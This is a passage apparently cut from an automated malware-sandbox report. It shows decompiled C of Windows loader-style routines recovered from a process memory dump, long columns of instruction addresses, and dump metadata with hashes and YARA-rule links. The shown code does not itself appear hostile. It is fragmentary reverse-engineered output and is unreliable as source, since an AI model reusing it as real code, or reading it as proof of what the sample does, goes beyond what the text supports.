																	_t174 = _t353 + 0x24; // 0x24
																	E04F102D6(_t174);
																}
																L04F077F0( *0x4fd7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E04F1C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L04EFEC7F(_t353);
										L04F119B8(_t287, 0, _t353, 0);
										_t200 = E04EEF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E04F2B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x4fdb2f8; // 0xde0000
									if((_t206 |  *0x4fdb2fc) == 0 || ( *0x4fdb2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x4fdb2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E04F96B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E04F96AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E04EFE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L04EFEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E04F29730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E04EFE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L04EF8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E04F23C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                                                                                                                                0x04efd5f2
                                                                                                                                0x04efd5f5
                                                                                                                                0x04efd5f5
                                                                                                                                0x04efd5fd
                                                                                                                                0x04efd600
                                                                                                                                0x04efd60a
                                                                                                                                0x04efd60d
                                                                                                                                0x04efd617
                                                                                                                                0x04efd61d
                                                                                                                                0x04efd627
                                                                                                                                0x04efd62e
                                                                                                                                0x04efd911
                                                                                                                                0x04efd913
                                                                                                                                0x00000000
                                                                                                                                0x04efd919
                                                                                                                                0x04efd919
                                                                                                                                0x04efd919
                                                                                                                                0x04efd634
                                                                                                                                0x04efd634
                                                                                                                                0x04efd634
                                                                                                                                0x04efd634
                                                                                                                                0x04efd640
                                                                                                                                0x04efd8bf
                                                                                                                                0x00000000
                                                                                                                                0x04efd646
                                                                                                                                0x04efd646
                                                                                                                                0x04efd64d
                                                                                                                                0x04efd652
                                                                                                                                0x04f4b2fc
                                                                                                                                0x04f4b2fc
                                                                                                                                0x04f4b302
                                                                                                                                0x04f4b33b
                                                                                                                                0x04f4b341
                                                                                                                                0x00000000
                                                                                                                                0x04f4b304
                                                                                                                                0x04f4b304
                                                                                                                                0x04f4b319
                                                                                                                                0x04f4b31e
                                                                                                                                0x04f4b324
                                                                                                                                0x04f4b326
                                                                                                                                0x04f4b332
                                                                                                                                0x04f4b347
                                                                                                                                0x04f4b34c
                                                                                                                                0x04f4b351
                                                                                                                                0x04f4b35a
                                                                                                                                0x00000000
                                                                                                                                0x04f4b328
                                                                                                                                0x04f4b328
                                                                                                                                0x00000000
                                                                                                                                0x04f4b328
                                                                                                                                0x04f4b326
                                                                                                                                0x04efd658
                                                                                                                                0x04efd658
                                                                                                                                0x04efd65b
                                                                                                                                0x04efd665
                                                                                                                                0x00000000
                                                                                                                                0x04efd66b
                                                                                                                                0x04efd66b
                                                                                                                                0x04efd66b
                                                                                                                                0x04efd66b
                                                                                                                                0x04efd66d
                                                                                                                                0x04efd672
                                                                                                                                0x04efd67a
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04efd680
                                                                                                                                0x04efd686
                                                                                                                                0x04efd8ce
                                                                                                                                0x04efd8d4
                                                                                                                                0x04efd8dd
                                                                                                                                0x04efd8e0
                                                                                                                                0x04efd68c
                                                                                                                                0x04efd691
                                                                                                                                0x04efd69d
                                                                                                                                0x04efd6a2
                                                                                                                                0x04efd6a7
                                                                                                                                0x04efd6b0
                                                                                                                                0x04efd6b5
                                                                                                                                0x04efd6e0
                                                                                                                                0x04efd6b7
                                                                                                                                0x04efd6b7
                                                                                                                                0x04efd6b9
                                                                                                                                0x04efd6b9
                                                                                                                                0x04efd6bb
                                                                                                                                0x04efd6bd
                                                                                                                                0x04efd6ce
                                                                                                                                0x04efd6d0
                                                                                                                                0x04efd6d2
                                                                                                                                0x04f4b363
                                                                                                                                0x04f4b365
                                                                                                                                0x00000000
                                                                                                                                0x04f4b36b
                                                                                                                                0x00000000
                                                                                                                                0x04f4b36b
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04efd6bf
                                                                                                                                0x04efd6bf
                                                                                                                                0x04efd6e5
                                                                                                                                0x04efd6e7
                                                                                                                                0x04efd6e9
                                                                                                                                0x04efd6ec
                                                                                                                                0x04efd6ec
                                                                                                                                0x04efd6ef
                                                                                                                                0x04efd6f5
                                                                                                                                0x04efd6f9
                                                                                                                                0x04efd6fb
                                                                                                                                0x04efd6fd
                                                                                                                                0x04efd701
                                                                                                                                0x04efd703
                                                                                                                                0x04efd70a
                                                                                                                                0x04efd70a
                                                                                                                                0x04efd701
                                                                                                                                0x04efd710
                                                                                                                                0x04efd710
                                                                                                                                0x04efd6c1
                                                                                                                                0x04efd6c1
                                                                                                                                0x04efd6c6
                                                                                                                                0x04f4b36d
                                                                                                                                0x04f4b36f
                                                                                                                                0x00000000
                                                                                                                                0x04f4b375
                                                                                                                                0x04f4b375
                                                                                                                                0x04f4b375
                                                                                                                                0x00000000
                                                                                                                                0x04f4b375
                                                                                                                                0x00000000
                                                                                                                                0x04efd6cc
                                                                                                                                0x04efd6d8
                                                                                                                                0x04efd6d8
                                                                                                                                0x04efd6d8
                                                                                                                                0x00000000
                                                                                                                                0x04efd6c6
                                                                                                                                0x04efd6bf
                                                                                                                                0x00000000
                                                                                                                                0x04efd6da
                                                                                                                                0x04efd6da
                                                                                                                                0x04efd716
                                                                                                                                0x04efd71b
                                                                                                                                0x04efd720
                                                                                                                                0x04efd726
                                                                                                                                0x04efd726
                                                                                                                                0x04efd72d
                                                                                                                                0x00000000
                                                                                                                                0x04efd733
                                                                                                                                0x04efd739
                                                                                                                                0x04efd742
                                                                                                                                0x04efd750
                                                                                                                                0x04efd758
                                                                                                                                0x04efd764
                                                                                                                                0x04efd776
                                                                                                                                0x04efd77a
                                                                                                                                0x04efd783
                                                                                                                                0x04efd928
                                                                                                                                0x04efd92c
                                                                                                                                0x04efd93d
                                                                                                                                0x04efd944
                                                                                                                                0x04efd94f
                                                                                                                                0x04efd954
                                                                                                                                0x04efd956
                                                                                                                                0x04efd95f
                                                                                                                                0x04efd961
                                                                                                                                0x04efd973
                                                                                                                                0x04efd973
                                                                                                                                0x04efd956
                                                                                                                                0x04efd944
                                                                                                                                0x04efd92c
                                                                                                                                0x04efd78b
                                                                                                                                0x04f4b394
                                                                                                                                0x04efd791
                                                                                                                                0x04efd798
                                                                                                                                0x04f4b3a3
                                                                                                                                0x04f4b3bb
                                                                                                                                0x04f4b3bb
                                                                                                                                0x04efd7a5
                                                                                                                                0x04efd866
                                                                                                                                0x04efd870
                                                                                                                                0x04efd884
                                                                                                                                0x04efd892
                                                                                                                                0x04efd898
                                                                                                                                0x04efd89e
                                                                                                                                0x04efd8a0
                                                                                                                                0x04efd8a6
                                                                                                                                0x04efd8ac
                                                                                                                                0x04efd8ae
                                                                                                                                0x04efd8b4
                                                                                                                                0x04efd8b4
                                                                                                                                0x04efd8ae
                                                                                                                                0x04efd7a5
                                                                                                                                0x04efd78b
                                                                                                                                0x04efd7b1
                                                                                                                                0x04f4b3c5
                                                                                                                                0x04f4b3c5
                                                                                                                                0x04efd7c3
                                                                                                                                0x04efd7ca
                                                                                                                                0x04efd7e5
                                                                                                                                0x04efd7eb
                                                                                                                                0x04efd8eb
                                                                                                                                0x04efd8ed
                                                                                                                                0x00000000
                                                                                                                                0x04efd8f3
                                                                                                                                0x04efd8f3
                                                                                                                                0x04efd8f3
                                                                                                                                0x00000000
                                                                                                                                0x04efd8ed
                                                                                                                                0x04efd7cc
                                                                                                                                0x04efd7cc
                                                                                                                                0x04efd7d2
                                                                                                                                0x00000000
                                                                                                                                0x04efd7d4
                                                                                                                                0x04efd7d4
                                                                                                                                0x04efd7d7
                                                                                                                                0x04efd7df
                                                                                                                                0x04f4b3d4
                                                                                                                                0x04f4b3d9
                                                                                                                                0x04f4b3dc
                                                                                                                                0x04f4b3dc
                                                                                                                                0x04f4b3df
                                                                                                                                0x04f4b3e2
                                                                                                                                0x04f4b468
                                                                                                                                0x04f4b46d
                                                                                                                                0x04f4b46f
                                                                                                                                0x04f4b46f
                                                                                                                                0x04f4b475
                                                                                                                                0x04efd8f8
                                                                                                                                0x04efd8f9
                                                                                                                                0x04efd8fd
                                                                                                                                0x04f4b3e8
                                                                                                                                0x04f4b3e8
                                                                                                                                0x04f4b3eb
                                                                                                                                0x04f4b3ed
                                                                                                                                0x00000000
                                                                                                                                0x04f4b3ef
                                                                                                                                0x04f4b3ef
                                                                                                                                0x04f4b3f1
                                                                                                                                0x04f4b3f4
                                                                                                                                0x04f4b3fe
                                                                                                                                0x04f4b404
                                                                                                                                0x04f4b409
                                                                                                                                0x04f4b40e
                                                                                                                                0x04f4b410
                                                                                                                                0x04f4b410
                                                                                                                                0x04f4b414
                                                                                                                                0x04f4b414
                                                                                                                                0x04f4b41b
                                                                                                                                0x04f4b420
                                                                                                                                0x04f4b423
                                                                                                                                0x04f4b425
                                                                                                                                0x04f4b427
                                                                                                                                0x04f4b42a
                                                                                                                                0x04f4b42d
                                                                                                                                0x04f4b42d
                                                                                                                                0x04f4b42a
                                                                                                                                0x04f4b432
                                                                                                                                0x04f4b436
                                                                                                                                0x04f4b438
                                                                                                                                0x04f4b43b
                                                                                                                                0x04f4b43b
                                                                                                                                0x04f4b449
                                                                                                                                0x04f4b44e
                                                                                                                                0x04f4b454
                                                                                                                                0x04f4b458
                                                                                                                                0x04f4b458
                                                                                                                                0x04f4b45d
                                                                                                                                0x00000000
                                                                                                                                0x04f4b45d
                                                                                                                                0x04f4b3ed
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04efd7df
                                                                                                                                0x04efd7d2
                                                                                                                                0x04efd7ca
                                                                                                                                0x04f4b37c
                                                                                                                                0x04f4b37e
                                                                                                                                0x04f4b385
                                                                                                                                0x04f4b38a
                                                                                                                                0x00000000
                                                                                                                                0x04f4b38a
                                                                                                                                0x04efd742
                                                                                                                                0x04efd7f1
                                                                                                                                0x04efd7f8
                                                                                                                                0x04f4b49b
                                                                                                                                0x04f4b49b
                                                                                                                                0x04efd800
                                                                                                                                0x04efd837
                                                                                                                                0x04efd843
                                                                                                                                0x04efd845
                                                                                                                                0x04efd847
                                                                                                                                0x04efd84a
                                                                                                                                0x04efd84b
                                                                                                                                0x04efd84e
                                                                                                                                0x04efd857
                                                                                                                                0x04efd802
                                                                                                                                0x04efd802
                                                                                                                                0x04efd80d
                                                                                                                                0x00000000
                                                                                                                                0x04efd818
                                                                                                                                0x04efd818
                                                                                                                                0x04efd824
                                                                                                                                0x04efd831
                                                                                                                                0x04f4b4a5
                                                                                                                                0x04f4b4ab
                                                                                                                                0x04f4b4b3
                                                                                                                                0x04f4b4b8
                                                                                                                                0x04f4b4bb
                                                                                                                                0x00000000
                                                                                                                                0x04f4b4c1
                                                                                                                                0x04f4b4c1
                                                                                                                                0x04f4b4c8
                                                                                                                                0x00000000
                                                                                                                                0x04f4b4ce
                                                                                                                                0x04f4b4d4
                                                                                                                                0x04f4b4e1
                                                                                                                                0x04f4b4e3
                                                                                                                                0x04f4b4e5
                                                                                                                                0x00000000
                                                                                                                                0x04f4b4eb
                                                                                                                                0x04f4b4f0
                                                                                                                                0x04f4b4f2
                                                                                                                                0x04efdac9
                                                                                                                                0x04efdacc
                                                                                                                                0x04efdacf
                                                                                                                                0x04efdad1
                                                                                                                                0x04efdd78
                                                                                                                                0x04efdd78
                                                                                                                                0x04efdcf2
                                                                                                                                0x00000000
                                                                                                                                0x04efdad7
                                                                                                                                0x04efdad9
                                                                                                                                0x04efdadb
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04efdae1
                                                                                                                                0x04efdae1
                                                                                                                                0x04efdae4
                                                                                                                                0x04efdae6
                                                                                                                                0x04f4b4f9
                                                                                                                                0x04f4b4f9
                                                                                                                                0x04f4b500
                                                                                                                                0x04efdaec
                                                                                                                                0x04efdaec
                                                                                                                                0x04efdaf5
                                                                                                                                0x04efdaf8
                                                                                                                                0x04efdafb
                                                                                                                                0x04efdb03
                                                                                                                                0x04efdb11
                                                                                                                                0x04efdb16
                                                                                                                                0x04efdb19
                                                                                                                                0x04efdb1b
                                                                                                                                0x04f4b52c
                                                                                                                                0x04f4b531
                                                                                                                                0x04f4b534
                                                                                                                                0x04efdb21
                                                                                                                                0x04efdb21
                                                                                                                                0x04efdb24
                                                                                                                                0x04efdcd9
                                                                                                                                0x04efdce2
                                                                                                                                0x04efdce5
                                                                                                                                0x04efdd6a
                                                                                                                                0x04efdd6d
                                                                                                                                0x00000000
                                                                                                                                0x04efdd73
                                                                                                                                0x04f4b51a
                                                                                                                                0x04f4b51c
                                                                                                                                0x04f4b51f
                                                                                                                                0x04f4b524
                                                                                                                                0x00000000
                                                                                                                                0x04f4b524
                                                                                                                                0x04efdce7
                                                                                                                                0x04efdce7
                                                                                                                                0x04efdce7
                                                                                                                                0x00000000
                                                                                                                                0x04efdce7
                                                                                                                                0x00000000
                                                                                                                                0x04efdb2a
                                                                                                                                0x04efdb2c
                                                                                                                                0x04efdb31
                                                                                                                                0x04efdb33
                                                                                                                                0x04efdb36
                                                                                                                                0x04efdb39
                                                                                                                                0x04efdb3b
                                                                                                                                0x04efdb66
                                                                                                                                0x04efdb66
                                                                                                                                0x04efdb3d
                                                                                                                                0x04efdb3d
                                                                                                                                0x04efdb3e
                                                                                                                                0x04efdb46
                                                                                                                                0x04efdb47
                                                                                                                                0x04efdb49
                                                                                                                                0x04efdb4c
                                                                                                                                0x04efdb53
                                                                                                                                0x04efdb55
                                                                                                                                0x04efdb58
                                                                                                                                0x04efdb5a
                                                                                                                                0x04f4b50a
                                                                                                                                0x04f4b50f
                                                                                                                                0x04f4b512
                                                                                                                                0x04efdb60
                                                                                                                                0x04efdb60
                                                                                                                                0x04efdb63
                                                                                                                                0x04efdb63
                                                                                                                                0x00000000
                                                                                                                                0x04efdb63
                                                                                                                                0x04efdb5a
                                                                                                                                0x04efdb3b
                                                                                                                                0x04efdb24
                                                                                                                                0x04efdb69
                                                                                                                                0x04efdb69
                                                                                                                                0x04efdb6c
                                                                                                                                0x04efdb6f
                                                                                                                                0x04efdb74
                                                                                                                                0x04f4b557
                                                                                                                                0x04f4b557
                                                                                                                                0x04f4b55e
                                                                                                                                0x04efdb7a
                                                                                                                                0x04efdb7c
                                                                                                                                0x04efdb7f
                                                                                                                                0x04efdb82
                                                                                                                                0x04efdb85
                                                                                                                                0x00000000
                                                                                                                                0x04efdb8b
                                                                                                                                0x04efdb8b
                                                                                                                                0x04efdb8d
                                                                                                                                0x04efdb9b
                                                                                                                                0x04efdb9b
                                                                                                                                0x04efdb9d
                                                                                                                                0x04efdba0
                                                                                                                                0x04efdba2
                                                                                                                                0x04efdba4
                                                                                                                                0x04efdba7
                                                                                                                                0x04efdba9
                                                                                                                                0x04efdbae
                                                                                                                                0x04efdbae
                                                                                                                                0x04efdbb1
                                                                                                                                0x04efdbb4
                                                                                                                                0x04efdbb4
                                                                                                                                0x04efdbb7
                                                                                                                                0x04efdbba
                                                                                                                                0x04efdcd2
                                                                                                                                0x04efdcd4
                                                                                                                                0x00000000
                                                                                                                                0x04efdbc0
                                                                                                                                0x04efdbc0
                                                                                                                                0x04efdbd2
                                                                                                                                0x04efdbd7
                                                                                                                                0x04efdbda
                                                                                                                                0x04efdbdd
                                                                                                                                0x04efdbdf
                                                                                                                                0x00000000
                                                                                                                                0x04efdbe5
                                                                                                                                0x04efdbe5
                                                                                                                                0x04efdbee
                                                                                                                                0x04efdbf1
                                                                                                                                0x04f4b541
                                                                                                                                0x04f4b544
                                                                                                                                0x00000000
                                                                                                                                0x04f4b546
                                                                                                                                0x04f4b546
                                                                                                                                0x00000000
                                                                                                                                0x04f4b546
                                                                                                                                0x04efdbf7
                                                                                                                                0x04efdbf7
                                                                                                                                0x04efdbfd
                                                                                                                                0x04efdbfd
                                                                                                                                0x04efdbff
                                                                                                                                0x04efdc0b
                                                                                                                                0x04efdc15
                                                                                                                                0x04efdc1b
                                                                                                                                0x04efdc1d
                                                                                                                                0x04efdc21
                                                                                                                                0x04efdc21
                                                                                                                                0x04efdc23
                                                                                                                                0x04efdc23
                                                                                                                                0x04efdc26
                                                                                                                                0x04efdc29
                                                                                                                                0x04efdc2b
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04efdc31
                                                                                                                                0x04efdc34
                                                                                                                                0x04efdc36
                                                                                                                                0x04efdcbf
                                                                                                                                0x04efdcbf
                                                                                                                                0x04efdcc2
                                                                                                                                0x00000000
                                                                                                                                0x04efdc3c
                                                                                                                                0x04efdc41
                                                                                                                                0x04efdc43
                                                                                                                                0x00000000
                                                                                                                                0x04efdc45
                                                                                                                                0x04efdc45
                                                                                                                                0x04efdc47
                                                                                                                                0x00000000
                                                                                                                                0x04efdc4d
                                                                                                                                0x04efdc4d
                                                                                                                                0x04efdc50
                                                                                                                                0x04efdc52
                                                                                                                                0x04efdc55
                                                                                                                                0x04efdcfa
                                                                                                                                0x04efdcfe
                                                                                                                                0x04efdd08
                                                                                                                                0x04efdd0a
                                                                                                                                0x04efdd0c
                                                                                                                                0x00000000
                                                                                                                                0x04efdd12
                                                                                                                                0x04efdd15
                                                                                                                                0x04efdd2d
                                                                                                                                0x04efdd2f
                                                                                                                                0x04efdd32
                                                                                                                                0x04efdd35
                                                                                                                                0x00000000
                                                                                                                                0x04efdd35
                                                                                                                                0x04efdc5b
                                                                                                                                0x04efdc5b
                                                                                                                                0x04efdc5e
                                                                                                                                0x04efdc61
                                                                                                                                0x04efdc64
                                                                                                                                0x04efdc67
                                                                                                                                0x04efdc67
                                                                                                                                0x04efdc6a
                                                                                                                                0x04efdc6c
                                                                                                                                0x04efdc8e
                                                                                                                                0x04efdc8e
                                                                                                                                0x04efdc91
                                                                                                                                0x04efdc93
                                                                                                                                0x04efdcce
                                                                                                                                0x04efdcce
                                                                                                                                0x04efdc95
                                                                                                                                0x04efdc9c
                                                                                                                                0x04efdc6e
                                                                                                                                0x04efdc72
                                                                                                                                0x04efdc75
                                                                                                                                0x04efdc77
                                                                                                                                0x04efdc79
                                                                                                                                0x04f4b551
                                                                                                                                0x04f4b551
                                                                                                                                0x00000000
                                                                                                                                0x04efdc7f
                                                                                                                                0x04efdc7f
                                                                                                                                0x04efdc81
                                                                                                                                0x00000000
                                                                                                                                0x04efdc83
                                                                                                                                0x04efdc86
                                                                                                                                0x04efdc88
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04efdc88
                                                                                                                                0x04efdc81
                                                                                                                                0x04efdc79
                                                                                                                                0x04efdc6c
                                                                                                                                0x04efdc55
                                                                                                                                0x04efdc47
                                                                                                                                0x04efdc43
                                                                                                                                0x00000000
                                                                                                                                0x04efdc36
                                                                                                                                0x04efdc23
                                                                                                                                0x00000000
                                                                                                                                0x04efdbff
                                                                                                                                0x04efdbf1
                                                                                                                                0x04efdbdf
                                                                                                                                0x04efdb8f
                                                                                                                                0x04efdb92
                                                                                                                                0x04efdb95
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04efdb95
                                                                                                                                0x04efdb8d
                                                                                                                                0x04efdb85
                                                                                                                                0x04efdb74
                                                                                                                                0x04efdc9f
                                                                                                                                0x04efdca2
                                                                                                                                0x04efdcb0
                                                                                                                                0x04efdcb0
                                                                                                                                0x04efdad1
                                                                                                                                0x04f4b4e5
                                                                                                                                0x04f4b4c8
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04efd831
                                                                                                                                0x04efd80d
                                                                                                                                0x00000000
                                                                                                                                0x04efd800
                                                                                                                                0x04f4b47f
                                                                                                                                0x04f4b485
                                                                                                                                0x00000000
                                                                                                                                0x04f4b485
                                                                                                                                0x04efd665
                                                                                                                                0x04efd652
                                                                                                                                0x00000000

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: dcb0d53a2d34b9a2ed51d579295608e888319c024be87c074d1b7d20fe10651b
                                                                                                                                • Instruction ID: 49a0bd6022f6ce9be029bd968dc534ae037fa8a2b473b20204cfb6e39aa3ebef
                                                                                                                                • Opcode Fuzzy Hash: dcb0d53a2d34b9a2ed51d579295608e888319c024be87c074d1b7d20fe10651b
                                                                                                                                • Instruction Fuzzy Hash: 23E1A231B01659CFEB24DF25CD44FAABBB2BF85308F054199DA0A9B291DB34BD42CB51
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EF849B, Relevance: .3, Instructions: 290COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 92%
                                                                                                                                			E04EF849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x4fbf9c0);
				E04F3D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x4fd7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E04EFCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
